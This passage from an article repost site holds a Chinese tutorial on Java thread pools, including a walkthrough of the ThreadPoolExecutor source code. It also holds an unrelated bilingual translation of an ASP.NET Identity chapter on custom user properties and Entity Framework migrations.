System.currentTimeMillis();f1.get();f2.get();f3.get();f4.get();end = System.currentTimeMillis();System.out.println(end - start);//输出并行耗费时间}static class MyTask implements Callable<List<Integer>> {int startPos, endPos;MyTask(int s, int e) {this.startPos = s;this.endPos = e;}@Overridepublic List<Integer> call() throws Exception {List<Integer> r = getPrime(startPos, endPos);return r;} }static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;}static List<Integer> getPrime(int start, int end) {List<Integer> results = new ArrayList<>();for(int i=start; i<=end; i++) {if(isPrime(i)) results.add(i);}return results;} } 8、TPE型线程池5:ScheduledPool 预定,延时线程池 根据延时时间(隔多长时间后运行),排序,哪个线程先执行,用户只需要指定核心线程数量 此线程池返回的池对象,和提交任务方法都不一样,比较涉及到时间 import java.util.Random;import java.util.concurrent.Executors;import java.util.concurrent.ScheduledExecutorService;import java.util.concurrent.TimeUnit;public class T10_ScheduledPool {public static void main(String[] args) {ScheduledExecutorService service = Executors.newScheduledThreadPool(4);service.scheduleAtFixedRate(()->{//提交延时任务try {TimeUnit.MILLISECONDS.sleep(new Random().nextInt(1000));} catch (InterruptedException e) {e.printStackTrace();}System.out.println(Thread.currentThread().getName());}, 0, 500, TimeUnit.MILLISECONDS);//指定延时时间和单位,第一个任务延时0毫秒,之后的任务,延时500毫秒} } 9、手写拒绝策略小例子 import java.util.concurrent.;public class T14_MyRejectedHandler {public static void main(String[] args) {ExecutorService service = new ThreadPoolExecutor(4, 4,0, TimeUnit.SECONDS, new ArrayBlockingQueue<>(6),Executors.defaultThreadFactory(),new MyHandler());//将手写拒绝策略传入}static class MyHandler implements RejectedExecutionHandler {//1、继承RejectedExecutionHandler@Overridepublic void rejectedExecution(Runnable r, ThreadPoolExecutor executor) {//2、重写方法//log("r rejected")//伪代码,表示通过log4j.log()报一下日志,拒绝的时间,线程名//save r kafka mysql redis//可以尝试保存队列//try 3 times //可以尝试几次,比如3次,重新去抢队列,3次还不行就丢弃if(executor.getQueue().size() < 10000) {//尝试条件,如果size>10000了,就执行拒绝策略//try put again();//如果小于10000,尝试将其放到队列中} }} } 10、ForkJoinPool线程池1:ForkJoinPool 前面我们讲过线程分为两大类,TPE和FJP ForkJoinPool(分解汇总任务(将任务细化,最后汇总结果),少量线程执行多个任务(子任务,TPE做不到先执行子任务),CPU密集型) 适合将大任务切分成多个小任务运行 两个方法,fork():分子任务,将子任务分配到线程池中 join():当前任务的计算结果,如果有子任务,等子任务结果返回后再汇总 下面实例实现,一百万个随机数求和,由两种方法实现,一种ForkJoinPool分任务并行,一种使用单线程做 import java.io.IOException;import java.util.Arrays;import java.util.Random;import java.util.concurrent.ForkJoinPool;import java.util.concurrent.RecursiveAction;import java.util.concurrent.RecursiveTask;public class T12_ForkJoinPool {//1000000个随机数求和static int[] nums = new int[1000000];//一堆数static final int MAX_NUM = 50000;//分任务时,每个任务的操作量不能多于50000个,否则就继续细分static Random r = new Random();//使用随机数将数组初始化static {for(int i=0; i<nums.length; i++) {nums[i] = r.nextInt(100);}System.out.println("---" + Arrays.stream(nums).sum()); //stream api 单线程就这么做,一个一个加}//分任务,需要继承,可以继承RecursiveAction(不需要返回值,一般用在不需要返回值的场景)或//RecursiveTask(需要返回值,我们用这个,因为我们需要最后获取求和结果)两个更好实现的类,//他俩继承与ForkJoinTaskstatic class AddTaskRet extends RecursiveTask<Long> {private static final long serialVersionUID = 1L;int start, end;AddTaskRet(int s, int e) {start = s;end = e;}@Overrideprotected Long compute() {if(end-start <= MAX_NUM) {//如果任务操作数小于规定的最大操作数,就进行运算,long sum = 0L;for(int i=start; i<end; i++) sum += nums[i];return sum;//返回结果} //如果分配的操作数大于规定,就继续细分(简单的重中点分,两半)int middle = start + (end-start)/2;//获取中间值AddTaskRet subTask1 = new AddTaskRet(start, middle);//传入起始值和中间值,表示一个子任务AddTaskRet subTask2 = new AddTaskRet(middle, end);//中间值和结尾值,表示一个子任务subTask1.fork();//分任务subTask2.fork();//分任务return subTask1.join() + subTask2.join();//最后返回结果汇总} }public static void main(String[] args) throws IOException {/ForkJoinPool fjp = new ForkJoinPool();AddTask task = new AddTask(0, nums.length);fjp.execute(task);/ForkJoinPool fjp = new ForkJoinPool();//创建线程池AddTaskRet task = new AddTaskRet(0, nums.length);//创建任务fjp.execute(task);//传入任务long result = task.join();//返回汇总结果System.out.println(result);//System.in.read();} } 11、ForkJoinPool线程池2:WorkStealingPool 任务偷取线程池 原来的线程池,都是有一个任务队列,而这个不同,它给每个线程都分配了一个任务队列 当某一个线程的任务队列没有任务,并且自己空闲,它就去其它线程的任务队列中偷任务,所以叫任务偷取线程池 细节:当线程自己从自己的任务队列拿任务时,不需要加锁,但是偷任务时,因为有两个线程,可能发生同步问题,需要加锁 此线程继承FJP 实例 import java.io.IOException;import java.util.concurrent.ExecutorService;import java.util.concurrent.Executors;import java.util.concurrent.TimeUnit;public class T11_WorkStealingPool {public static void main(String[] args) throws IOException {ExecutorService service = Executors.newWorkStealingPool();System.out.println(Runtime.getRuntime().availableProcessors());service.execute(new R(1000));service.execute(new R(2000));service.execute(new R(2000));service.execute(new R(2000)); //daemonservice.execute(new R(2000));//由于产生的是精灵线程(守护线程、后台线程),主线程不阻塞的话,看不到输出System.in.read(); }static class R implements Runnable {int time;R(int t) {this.time = t;}@Overridepublic void run() {try {TimeUnit.MILLISECONDS.sleep(time);} catch (InterruptedException e) {e.printStackTrace();}System.out.println(time + " " + Thread.currentThread().getName());} }} 12、流式API:ParallelStreamAPI 不懂的请参考:https://blog.csdn.net/grd_java/article/details/110265219 实例 import java.util.ArrayList;import java.util.List;import java.util.Random;public class T13_ParallelStreamAPI {public static void main(String[] args) {List<Integer> nums = new ArrayList<>();Random r = new Random();for(int i=0; i<10000; i++) nums.add(1000000 + r.nextInt(1000000));//System.out.println(nums);long start = System.currentTimeMillis();nums.forEach(v->isPrime(v));long end = System.currentTimeMillis();System.out.println(end - start);//使用parallel stream apistart = System.currentTimeMillis();nums.parallelStream().forEach(T13_ParallelStreamAPI::isPrime);//并行流,将任务切分成子任务执行end = System.currentTimeMillis();System.out.println(end - start);}static boolean isPrime(int num) {for(int i=2; i<=num/2; i++) {if(num % i == 0) return false;}return true;} } 13、总结 总结 Callable相当于一Runnable但是它有返回值 Future:存储执行完产生的结果 FutureTask 相当于Future+Runnable,既可以执行任务,又能获取任务执行的Future结果 CompletableFuture 可以多任务异步,并对多任务控制,整合任务结果,细化完美,比如可以一个任务完成就可以整合结果,也可以所有任务完成才整合结果 4、ThreadPoolExecutor源码解析 依然只讲重点,实际还需要大家按照上篇博客中看源码的方式来看 1、常用变量的解释 // 1. ctl,可以看做一个int类型的数字,高3位表示线程池状态,低29位表示worker数量private final AtomicInteger ctl = new AtomicInteger(ctlOf(RUNNING, 0));// 2. COUNT_BITS,Integer.SIZE为32,所以COUNT_BITS为29private static final int COUNT_BITS = Integer.SIZE - 3;// 3. CAPACITY,线程池允许的最大线程数。1左移29位,然后减1,即为 2^29 - 1private static final int CAPACITY = (1 << COUNT_BITS) - 1;// runState is stored in the high-order bits// 4. 线程池有5种状态,按大小排序如下:RUNNING < SHUTDOWN < STOP < TIDYING < TERMINATEDprivate static final int RUNNING = -1 << COUNT_BITS;private static final int SHUTDOWN = 0 << COUNT_BITS;private static final int STOP = 1 << COUNT_BITS;private static final int TIDYING = 2 << COUNT_BITS;private static final int TERMINATED = 3 << COUNT_BITS;// Packing and unpacking ctl// 5. runStateOf(),获取线程池状态,通过按位与操作,低29位将全部变成0private static int runStateOf(int c) { return c & ~CAPACITY; }// 6. workerCountOf(),获取线程池worker数量,通过按位与操作,高3位将全部变成0private static int workerCountOf(int c) { return c & CAPACITY; }// 7. ctlOf(),根据线程池状态和线程池worker数量,生成ctl值private static int ctlOf(int rs, int wc) { return rs | wc; }/ Bit field accessors that don't require unpacking ctl. These depend on the bit layout and on workerCount being never negative./// 8. runStateLessThan(),线程池状态小于xxprivate static boolean runStateLessThan(int c, int s) {return c < s;}// 9. runStateAtLeast(),线程池状态大于等于xxprivate static boolean runStateAtLeast(int c, int s) {return c >= s;} 2、构造方法 public ThreadPoolExecutor(int corePoolSize,int maximumPoolSize,long keepAliveTime,TimeUnit unit,BlockingQueue<Runnable> workQueue,ThreadFactory threadFactory,RejectedExecutionHandler handler) {// 基本类型参数校验if (corePoolSize < 0 ||maximumPoolSize <= 0 ||maximumPoolSize < corePoolSize ||keepAliveTime < 0)throw new IllegalArgumentException();// 空指针校验if (workQueue == null || threadFactory == null || handler == null)throw new NullPointerException();this.corePoolSize = corePoolSize;this.maximumPoolSize = maximumPoolSize;this.workQueue = workQueue;// 根据传入参数unit和keepAliveTime,将存活时间转换为纳秒存到变量keepAliveTime 中this.keepAliveTime = unit.toNanos(keepAliveTime);this.threadFactory = threadFactory;this.handler = handler;} 3、提交执行task的过程 public void execute(Runnable command) {if (command == null)throw new NullPointerException();/ Proceed in 3 steps: 1. If fewer than corePoolSize threads are running, try to start a new thread with the given command as its first task. The call to addWorker atomically checks runState and workerCount, and so prevents false alarms that would add threads when it shouldn't, by returning false. 2. If a task can be successfully queued, then we still need to double-check whether we should have added a thread (because existing ones died since last checking) or that the pool shut down since entry into this method. So we recheck state and if necessary roll back the enqueuing if stopped, or start a new thread if there are none. 3. If we cannot queue task, then we try to add a new thread. If it fails, we know we are shut down or saturated and so reject the task./int c = ctl.get();// worker数量比核心线程数小,直接创建worker执行任务if (workerCountOf(c) < corePoolSize) {if (addWorker(command, true))return;c = ctl.get();}// worker数量超过核心线程数,任务直接进入队列if (isRunning(c) && workQueue.offer(command)) {int recheck = ctl.get();// 线程池状态不是RUNNING状态,说明执行过shutdown命令,需要对新加入的任务执行reject()操作。// 这儿为什么需要recheck,是因为任务入队列前后,线程池的状态可能会发生变化。if (! isRunning(recheck) && remove(command))reject(command);// 这儿为什么需要判断0值,主要是在线程池构造方法中,核心线程数允许为0else if (workerCountOf(recheck) == 0)addWorker(null, false);}// 如果线程池不是运行状态,或者任务进入队列失败,则尝试创建worker执行任务。// 这儿有3点需要注意:// 1. 线程池不是运行状态时,addWorker内部会判断线程池状态// 2. addWorker第2个参数表示是否创建核心线程// 3. addWorker返回false,则说明任务执行失败,需要执行reject操作else if (!addWorker(command, false))reject(command);} 4、addworker源码解析 private boolean addWorker(Runnable firstTask, boolean core) {retry:// 外层自旋for (;;) {int c = ctl.get();int rs = runStateOf(c);// 这个条件写得比较难懂,我对其进行了调整,和下面的条件等价// (rs > SHUTDOWN) || // (rs == SHUTDOWN && firstTask != null) || // (rs == SHUTDOWN && workQueue.isEmpty())// 1. 线程池状态大于SHUTDOWN时,直接返回false// 2. 线程池状态等于SHUTDOWN,且firstTask不为null,直接返回false// 3. 线程池状态等于SHUTDOWN,且队列为空,直接返回false// Check if queue empty only if necessary.if (rs >= SHUTDOWN &&! (rs == SHUTDOWN &&firstTask == null &&! workQueue.isEmpty()))return false;// 内层自旋for (;;) {int wc = workerCountOf(c);// worker数量超过容量,直接返回falseif (wc >= CAPACITY ||wc >= (core ? corePoolSize : maximumPoolSize))return false;// 使用CAS的方式增加worker数量。// 若增加成功,则直接跳出外层循环进入到第二部分if (compareAndIncrementWorkerCount(c))break retry;c = ctl.get(); // Re-read ctl// 线程池状态发生变化,对外层循环进行自旋if (runStateOf(c) != rs)continue retry;// 其他情况,直接内层循环进行自旋即可// else CAS failed due to workerCount change; retry inner loop} }boolean workerStarted = false;boolean workerAdded = false;Worker w = null;try {w = new Worker(firstTask);final Thread t = w.thread;if (t != null) {final ReentrantLock mainLock = this.mainLock;// worker的添加必须是串行的,因此需要加锁mainLock.lock();try {// Recheck while holding lock.// Back out on ThreadFactory failure or if// shut down before lock acquired.// 这儿需要重新检查线程池状态int rs = runStateOf(ctl.get());if (rs < SHUTDOWN ||(rs == SHUTDOWN && firstTask == null)) {// worker已经调用过了start()方法,则不再创建workerif (t.isAlive()) // precheck that t is startablethrow new IllegalThreadStateException();// worker创建并添加到workers成功workers.add(w);// 更新largestPoolSize变量int s = workers.size();if (s > largestPoolSize)largestPoolSize = s;workerAdded = true;} } finally {mainLock.unlock();}// 启动worker线程if (workerAdded) {t.start();workerStarted = true;} }} finally {// worker线程启动失败,说明线程池状态发生了变化(关闭操作被执行),需要进行shutdown相关操作if (! workerStarted)addWorkerFailed(w);}return workerStarted;} 5、线程池worker任务单元 private final class Workerextends AbstractQueuedSynchronizerimplements Runnable{/ This class will never be serialized, but we provide a serialVersionUID to suppress a javac warning./private static final long serialVersionUID = 6138294804551838833L;/ Thread this worker is running in. Null if factory fails. /final Thread thread;/ Initial task to run. Possibly null. /Runnable firstTask;/ Per-thread task counter /volatile long completedTasks;/ Creates with given first task and thread from ThreadFactory. @param firstTask the first task (null if none)/Worker(Runnable firstTask) {setState(-1); // inhibit interrupts until runWorkerthis.firstTask = firstTask;// 这儿是Worker的关键所在,使用了线程工厂创建了一个线程。传入的参数为当前workerthis.thread = getThreadFactory().newThread(this);}/ Delegates main run loop to outer runWorker /public void run() {runWorker(this);}// 省略代码...} 6、核心线程执行逻辑-runworker final void runWorker(Worker w) {Thread wt = Thread.currentThread();Runnable task = w.firstTask;w.firstTask = null;// 调用unlock()是为了让外部可以中断w.unlock(); // allow interrupts// 这个变量用于判断是否进入过自旋(while循环)boolean completedAbruptly = true;try {// 这儿是自旋// 1. 如果firstTask不为null,则执行firstTask;// 2. 如果firstTask为null,则调用getTask()从队列获取任务。// 3. 阻塞队列的特性就是:当队列为空时,当前线程会被阻塞等待while (task != null || (task = getTask()) != null) {// 这儿对worker进行加锁,是为了达到下面的目的// 1. 降低锁范围,提升性能// 2. 保证每个worker执行的任务是串行的w.lock();// If pool is stopping, ensure thread is interrupted;// if not, ensure thread is not interrupted. This// requires a recheck in second case to deal with// shutdownNow race while clearing interrupt// 如果线程池正在停止,则对当前线程进行中断操作if ((runStateAtLeast(ctl.get(), STOP) ||(Thread.interrupted() &&runStateAtLeast(ctl.get(), STOP))) &&!wt.isInterrupted())wt.interrupt();// 执行任务,且在执行前后通过beforeExecute()和afterExecute()来扩展其功能。// 这两个方法在当前类里面为空实现。try {beforeExecute(wt, task);Throwable thrown = null;try {task.run();} catch (RuntimeException x) {thrown = x; throw x;} catch (Error x) {thrown = x; throw x;} catch (Throwable x) {thrown = x; throw new Error(x);} finally {afterExecute(task, thrown);} } finally {// 帮助gctask = null;// 已完成任务数加一 w.completedTasks++;w.unlock();} }completedAbruptly = false;} finally {// 自旋操作被退出,说明线程池正在结束processWorkerExit(w, completedAbruptly);} } 本篇文章为转载内容。原文链接:https://blog.csdn.net/grd_java/article/details/113116244。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
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...dentity技术,描述了如何运用ASP.NET Identity实现应用程序的用户管理,以及实现应用程序的认证与授权等相关技术,译者希望本系列教程能成为掌握ASP.NET Identity技术的一份完整而有价值的资料。读者若是能够按照文章的描述,一边阅读、一边实践、一边理解,定能有意想不到的巨大收获!希望本系列博文能够得到广大园友的高度推荐。 15 Advanced ASP.NET Identity 15 ASP.NET Identity高级技术 In this chapter, I finish my description of ASP.NET Identity by showing you some of the advanced features it offers. I demonstrate how you can extend the database schema by defining custom properties on the user class and how to use database migrations to apply those properties without deleting the data in the ASP.NET Identity database. I also explain how ASP.NET Identity supports the concept of claims and demonstrates how they can be used to flexibly authorize access to action methods. I finish the chapter—and the book—by showing you how ASP.NET Identity makes it easy to authenticate users through third parties. I demonstrate authentication with Google accounts, but ASP.NET Identity has built-in support for Microsoft, Facebook, and Twitter accounts as well. Table 15-1 summarizes this chapter. 本章将完成对ASP.NET Identity的描述,向你展示它所提供的一些高级特性。我将演示,你可以扩展ASP.NET Identity的数据库架构,其办法是在用户类上定义一些自定义属性。也会演示如何使用数据库迁移,这样可以运用自定义属性,而不必删除ASP.NET Identity数据库中的数据。还会解释ASP.NET Identity如何支持声明(Claims)概念,并演示如何将它们灵活地用来对动作方法进行授权访问。最后向你展示ASP.NET Identity很容易通过第三方部件来认证用户,以此结束本章以及本书。将要演示的是使用Google账号认证,但ASP.NET Identity对于Microsoft、Facebook以及Twitter账号,都有内建的支持。表15-1是本章概要。 Table 15-1. Chapter Summary 表15-1. 本章概要 Problem 问题 Solution 解决方案 Listing 清单号 Store additional information about users. 存储用户的附加信息 Define custom user properties. 定义自定义用户属性 1–3, 8–11 Update the database schema without deleting user data. 更新数据库架构而不删除用户数据 Perform a database migration. 执行数据库迁移 4–7 Perform fine-grained authorization. 执行细粒度授权 Use claims. 使用声明(Claims) 12–14 Add claims about a user. 添加用户的声明(Claims) Use the ClaimsIdentity.AddClaims method. 使用ClaimsIdentity.AddClaims方法 15–19 Authorize access based on claim values. 基于声明(Claims)值授权访问 Create a custom authorization filter attribute. 创建一个自定义的授权过滤器注解属性 20–21 Authenticate through a third party. 通过第三方认证 Install the NuGet package for the authentication provider, redirect requests to that provider, and specify a callback URL that creates the user account. 安装认证提供器的NuGet包,将请求重定向到该提供器,并指定一个创建用户账号的回调URL。 22–25 15.1 Preparing the Example Project 15.1 准备示例项目 In this chapter, I am going to continue working on the Users project I created in Chapter 13 and enhanced in Chapter 14. No changes to the application are required, but start the application and make sure that there are users in the database. Figure 15-1 shows the state of my database, which contains the users Admin, Alice, Bob, and Joe from the previous chapter. To check the users, start the application and request the /Admin/Index URL and authenticate as the Admin user. 本章打算继续使用第13章创建并在第14章增强的Users项目。对应用程序无需做什么改变,但需要启动应用程序,并确保数据库中有一些用户。图15-1显示了数据库的状态,它含有上一章的用户Admin、Alice、Bob以及Joe。为了检查用户,请启动应用程序,请求/Admin/Index URL,并以Admin用户进行认证。 Figure 15-1. The initial users in the Identity database 图15-1. Identity数据库中的最初用户 I also need some roles for this chapter. I used the RoleAdmin controller to create roles called Users and Employees and assigned the users to those roles, as described in Table 15-2. 本章还需要一些角色。我用RoleAdmin控制器创建了角色Users和Employees,并为这些角色指定了一些用户,如表15-2所示。 Table 15-2. The Types of Web Forms Code Nuggets 表15-2. 角色及成员(作者将此表的标题写错了——译者注) Role 角色 Members 成员 Users Alice, Joe Employees Alice, Bob Figure 15-2 shows the required role configuration displayed by the RoleAdmin controller. 图15-2显示了由RoleAdmin控制器所显示出来的必要的角色配置。 Figure 15-2. Configuring the roles required for this chapter 图15-2. 配置本章所需的角色 15.2 Adding Custom User Properties 15.2 添加自定义用户属性 When I created the AppUser class to represent users in Chapter 13, I noted that the base class defined a basic set of properties to describe the user, such as e-mail address and telephone number. Most applications need to store more information about users, including persistent application preferences and details such as addresses—in short, any data that is useful to running the application and that should last between sessions. In ASP.NET Membership, this was handled through the user profile system, but ASP.NET Identity takes a different approach. 我在第13章创建AppUser类来表示用户时曾做过说明,基类定义了一组描述用户的基本属性,如E-mail地址、电话号码等。大多数应用程序还需要存储用户的更多信息,包括持久化应用程序爱好以及地址等细节——简言之,需要存储对运行应用程序有用并且在各次会话之间应当保持的任何数据。在ASP.NET Membership中,这是通过用户资料(User Profile)系统来处理的,但ASP.NET Identity采取了一种不同的办法。 Because the ASP.NET Identity system uses Entity Framework to store its data by default, defining additional user information is just a matter of adding properties to the user class and letting the Code First feature create the database schema required to store them. Table 15-3 puts custom user properties in context. 因为ASP.NET Identity默认是使用Entity Framework来存储其数据的,定义附加的用户信息只不过是给用户类添加属性的事情,然后让Code First特性去创建需要存储它们的数据库架构即可。表15-3描述了自定义用户属性的情形。 Table 15-3. Putting Cusotm User Properties in Context 表15-3. 自定义用户属性的情形 Question 问题 Answer 回答 What is it? 什么是自定义用户属性? Custom user properties allow you to store additional information about your users, including their preferences and settings. 自定义用户属性让你能够存储附加的用户信息,包括他们的爱好和设置。 Why should I care? 为何要关心它? A persistent store of settings means that the user doesn’t have to provide the same information each time they log in to the application. 设置的持久化存储意味着,用户不必每次登录到应用程序时都提供同样的信息。 How is it used by the MVC framework? 在MVC框架中如何使用它? This feature isn’t used directly by the MVC framework, but it is available for use in action methods. 此特性不是由MVC框架直接使用的,但它在动作方法中使用是有效的。 15.2.1 Defining Custom Properties 15.2.1 定义自定义属性 Listing 15-1 shows how I added a simple property to the AppUser class to represent the city in which the user lives. 清单15-1演示了如何给AppUser类添加一个简单的属性,用以表示用户生活的城市。 Listing 15-1. Adding a Property in the AppUser.cs File 清单15-1. 在AppUser.cs文件中添加属性 using System;using Microsoft.AspNet.Identity.EntityFramework;namespace Users.Models { public enum Cities {LONDON, PARIS, CHICAGO}public class AppUser : IdentityUser {public Cities City { get; set; } }} I have defined an enumeration called Cities that defines values for some large cities and added a property called City to the AppUser class. To allow the user to view and edit their City property, I added actions to the Home controller, as shown in Listing 15-2. 这里定义了一个枚举,名称为Cities,它定义了一些大城市的值,另外给AppUser类添加了一个名称为City的属性。为了让用户能够查看和编辑City属性,给Home控制器添加了几个动作方法,如清单15-2所示。 Listing 15-2. Adding Support for Custom User Properties in the HomeController.cs File 清单15-2. 在HomeController.cs文件中添加对自定义属性的支持 using System.Web.Mvc;using System.Collections.Generic;using System.Web;using System.Security.Principal;using System.Threading.Tasks;using Users.Infrastructure;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.Owin;using Users.Models;namespace Users.Controllers {public class HomeController : Controller {[Authorize]public ActionResult Index() {return View(GetData("Index"));}[Authorize(Roles = "Users")]public ActionResult OtherAction() {return View("Index", GetData("OtherAction"));}private Dictionary<string, object> GetData(string actionName) {Dictionary<string, object> dict= new Dictionary<string, object>();dict.Add("Action", actionName);dict.Add("User", HttpContext.User.Identity.Name);dict.Add("Authenticated", HttpContext.User.Identity.IsAuthenticated);dict.Add("Auth Type", HttpContext.User.Identity.AuthenticationType);dict.Add("In Users Role", HttpContext.User.IsInRole("Users"));return dict;} [Authorize]public ActionResult UserProps() {return View(CurrentUser);}[Authorize][HttpPost]public async Task<ActionResult> UserProps(Cities city) {AppUser user = CurrentUser;user.City = city;await UserManager.UpdateAsync(user);return View(user);}private AppUser CurrentUser {get {return UserManager.FindByName(HttpContext.User.Identity.Name);} }private AppUserManager UserManager {get {return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();} }} } I added a CurrentUser property that uses the AppUserManager class to retrieve an AppUser instance to represent the current user. I pass the AppUser object as the view model object in the GET version of the UserProps action method, and the POST method uses it to update the value of the new City property. Listing 15-3 shows the UserProps.cshtml view, which displays the City property value and contains a form to change it. 我添加了一个CurrentUser属性,它使用AppUserManager类接收了表示当前用户的AppUser实例。在GET版本的UserProps动作方法中,传递了这个AppUser对象作为视图模型。而在POST版的方法中用它更新了City属性的值。清单15-3显示了UserProps.cshtml视图,它显示了City属性的值,并包含一个修改它的表单。 Listing 15-3. The Contents of the UserProps.cshtml File in the Views/Home Folder 清单15-3. Views/Home文件夹中UserProps.cshtml文件的内容 @using Users.Models@model AppUser@{ ViewBag.Title = "UserProps";}<div class="panel panel-primary"><div class="panel-heading">Custom User Properties</div><table class="table table-striped"><tr><th>City</th><td>@Model.City</td></tr></table></div> @using (Html.BeginForm()) {<div class="form-group"><label>City</label>@Html.DropDownListFor(x => x.City, new SelectList(Enum.GetNames(typeof(Cities))))</div><button class="btn btn-primary" type="submit">Save</button>} Caution Don’t start the application when you have created the view. In the sections that follow, I demonstrate how to preserve the contents of the database, and if you start the application now, the ASP.NET Identity users will be deleted. 警告:创建了视图之后不要启动应用程序。在以下小节中,将演示如何保留数据库的内容,如果现在启动应用程序,将会删除ASP.NET Identity的用户。 15.2.2 Preparing for Database Migration 15.2.2 准备数据库迁移 The default behavior for the Entity Framework Code First feature is to drop the tables in the database and re-create them whenever classes that drive the schema have changed. You saw this in Chapter 14 when I added support for roles: When the application was started, the database was reset, and the user accounts were lost. Entity Framework Code First特性的默认行为是,一旦修改了派生数据库架构的类,便会删除数据库中的数据表,并重新创建它们。在第14章可以看到这种情况,在我添加角色支持时:当重启应用程序后,数据库被重置,用户账号也丢失。 Don’t start the application yet, but if you were to do so, you would see a similar effect. Deleting data during development is usually not a problem, but doing so in a production setting is usually disastrous because it deletes all of the real user accounts and causes a panic while the backups are restored. In this section, I am going to demonstrate how to use the database migration feature, which updates a Code First schema in a less brutal manner and preserves the existing data it contains. 不要启动应用程序,但如果你这么做了,会看到类似的效果。在开发期间删除数据没什么问题,但如果在产品设置中这么做了,通常是灾难性的,因为它会删除所有真实的用户账号,而备份恢复是很痛苦的事。在本小节中,我打算演示如何使用数据库迁移特性,它能以比较温和的方式更新Code First的架构,并保留架构中的已有数据。 The first step is to issue the following command in the Visual Studio Package Manager Console: 第一个步骤是在Visual Studio的“Package Manager Console(包管理器控制台)”中发布以下命令: Enable-Migrations –EnableAutomaticMigrations This enables the database migration support and creates a Migrations folder in the Solution Explorer that contains a Configuration.cs class file, the contents of which are shown in Listing 15-4. 它启用了数据库的迁移支持,并在“Solution Explorer(解决方案资源管理器)”创建一个Migrations文件夹,其中含有一个Configuration.cs类文件,内容如清单15-4所示。 Listing 15-4. The Contents of the Configuration.cs File 清单15-4. Configuration.cs文件的内容 namespace Users.Migrations {using System;using System.Data.Entity;using System.Data.Entity.Migrations;using System.Linq;internal sealed class Configuration: DbMigrationsConfiguration<Users.Infrastructure.AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(Users.Infrastructure.AppIdentityDbContext context) {// This method will be called after migrating to the latest version.// 此方法将在迁移到最新版本时调用// You can use the DbSet<T>.AddOrUpdate() helper extension method// to avoid creating duplicate seed data. E.g.// 例如,你可以使用DbSet<T>.AddOrUpdate()辅助器方法来避免创建重复的种子数据//// context.People.AddOrUpdate(// p => p.FullName,// new Person { FullName = "Andrew Peters" },// new Person { FullName = "Brice Lambson" },// new Person { FullName = "Rowan Miller" }// );//} }} Tip You might be wondering why you are entering a database migration command into the console used to manage NuGet packages. The answer is that the Package Manager Console is really PowerShell, which is a general-purpose tool that is mislabeled by Visual Studio. You can use the console to issue a wide range of helpful commands. See http://go.microsoft.com/fwlink/?LinkID=108518 for details. 提示:你可能会觉得奇怪,为什么要在管理NuGet包的控制台中输入数据库迁移的命令?答案是“Package Manager Console(包管理控制台)”是真正的PowerShell,这是Visual studio冒用的一个通用工具。你可以使用此控制台发送大量的有用命令,详见http://go.microsoft.com/fwlink/?LinkID=108518。 The class will be used to migrate existing content in the database to the new schema, and the Seed method will be called to provide an opportunity to update the existing database records. In Listing 15-5, you can see how I have used the Seed method to set a default value for the new City property I added to the AppUser class. (I have also updated the class file to reflect my usual coding style.) 这个类将用于把数据库中的现有内容迁移到新的数据库架构,Seed方法的调用为更新现有数据库记录提供了机会。在清单15-5中可以看到,我如何用Seed方法为新的City属性设置默认值,City是添加到AppUser类中自定义属性。(为了体现我一贯的编码风格,我对这个类文件也进行了更新。) Listing 15-5. Managing Existing Content in the Configuration.cs File 清单15-5. 在Configuration.cs文件中管理已有内容 using System.Data.Entity.Migrations;using Microsoft.AspNet.Identity;using Microsoft.AspNet.Identity.EntityFramework;using Users.Infrastructure;using Users.Models;namespace Users.Migrations {internal sealed class Configuration: DbMigrationsConfiguration<AppIdentityDbContext> {public Configuration() {AutomaticMigrationsEnabled = true;ContextKey = "Users.Infrastructure.AppIdentityDbContext";}protected override void Seed(AppIdentityDbContext context) {AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context)); string roleName = "Administrators";string userName = "Admin";string password = "MySecret";string email = "admin@example.com";if (!roleMgr.RoleExists(roleName)) {roleMgr.Create(new AppRole(roleName));}AppUser user = userMgr.FindByName(userName);if (user == null) {userMgr.Create(new AppUser { UserName = userName, Email = email },password);user = userMgr.FindByName(userName);}if (!userMgr.IsInRole(user.Id, roleName)) {userMgr.AddToRole(user.Id, roleName);}foreach (AppUser dbUser in userMgr.Users) {dbUser.City = Cities.PARIS;}context.SaveChanges();} }} You will notice that much of the code that I added to the Seed method is taken from the IdentityDbInit class, which I used to seed the database with an administration user in Chapter 14. This is because the new Configuration class added to support database migrations will replace the seeding function of the IdentityDbInit class, which I’ll update shortly. Aside from ensuring that there is an admin user, the statements in the Seed method that are important are the ones that set the initial value for the City property I added to the AppUser class, as follows: 你可能会注意到,添加到Seed方法中的许多代码取自于IdentityDbInit类,在第14章中我用这个类将管理用户植入了数据库。这是因为这个新添加的、用以支持数据库迁移的Configuration类,将代替IdentityDbInit类的种植功能,我很快便会更新这个类。除了要确保有admin用户之外,在Seed方法中的重要语句是那些为AppUser类的City属性设置初值的语句,如下所示: ...foreach (AppUser dbUser in userMgr.Users) { dbUser.City = Cities.PARIS;}context.SaveChanges();... You don’t have to set a default value for new properties—I just wanted to demonstrate that the Seed method in the Configuration class can be used to update the existing user records in the database. 你不一定要为新属性设置默认值——这里只是想演示Configuration类中的Seed方法,可以用它更新数据库中的已有用户记录。 Caution Be careful when setting values for properties in the Seed method for real projects because the values will be applied every time you change the schema, overriding any values that the user has set since the last schema update was performed. I set the value of the City property just to demonstrate that it can be done. 警告:在用于真实项目的Seed方法中为属性设置值时要小心,因为你每一次修改架构时,都会运用这些值,这会将自执行上一次架构更新之后,用户设置的任何数据覆盖掉。这里设置City属性的值只是为了演示它能够这么做。 Changing the Database Context Class 修改数据库上下文类 The reason that I added the seeding code to the Configuration class is that I need to change the IdentityDbInit class. At present, the IdentityDbInit class is derived from the descriptively named DropCreateDatabaseIfModelChanges<AppIdentityDbContext> class, which, as you might imagine, drops the entire database when the Code First classes change. Listing 15-6 shows the changes I made to the IdentityDbInit class to prevent it from affecting the database. 